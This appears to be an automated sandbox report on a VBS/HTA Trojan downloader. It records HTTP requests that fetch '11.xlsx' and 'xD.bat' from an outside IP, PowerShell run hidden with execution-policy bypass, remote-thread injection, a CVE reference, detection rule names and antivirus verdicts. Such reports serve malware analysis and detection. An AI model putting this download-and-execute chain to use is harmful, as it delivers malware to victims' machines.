description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
host 193.222.96.124
file C:\Users\test22\AppData\Roaming\11.xlsx
file C:\Users\test22\AppData\Roaming\xD.bat
Time & API Arguments Status Return Repeated

send

 buffer: GET /11.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive
socket: 1436
sent: 76
1 76 0

send

 buffer: GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287
socket: 876
sent: 51
1 51 0
cve CVE-2013-3906
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\11.xlsx
parent_process powershell.exe martian_process "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\xD.bat"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\xD.bat
Process injection Process 2980 resumed a thread in remote process 1216
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1216
1 0 0
option -w hidden value Attempts to execute command with a hidden window
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Cynet Malicious (score: 99)
Skyhigh HTA/Downloader.f
ALYac VB:Trojan.Valyria.7482
VIPRE VB:Trojan.Valyria.7482
Arcabit VB:Trojan.Valyria.D1D3A
ESET-NOD32 VBS/Agent.QVR
McAfee HTA/Downloader.f
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Valyria.7482
NANO-Antivirus Trojan.Script.Downloader.jpdglv
MicroWorld-eScan VB:Trojan.Valyria.7482
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft VB:Trojan.Valyria.7482 (B)
F-Secure Malware.VBS/Dldr.Agent.VPLT
FireEye VB:Trojan.Valyria.7482
Ikarus Trojan.VBS.Agent
Google Detected
Avira VBS/Dldr.Agent.VPLT
GData VB:Trojan.Valyria.7482
Varist VBS/Agent.AZC!Eldorado
MAX malware (ai score=82)
Fortinet VBS/Agent.BSD!tr
AVG Script:SNH-gen [Drp]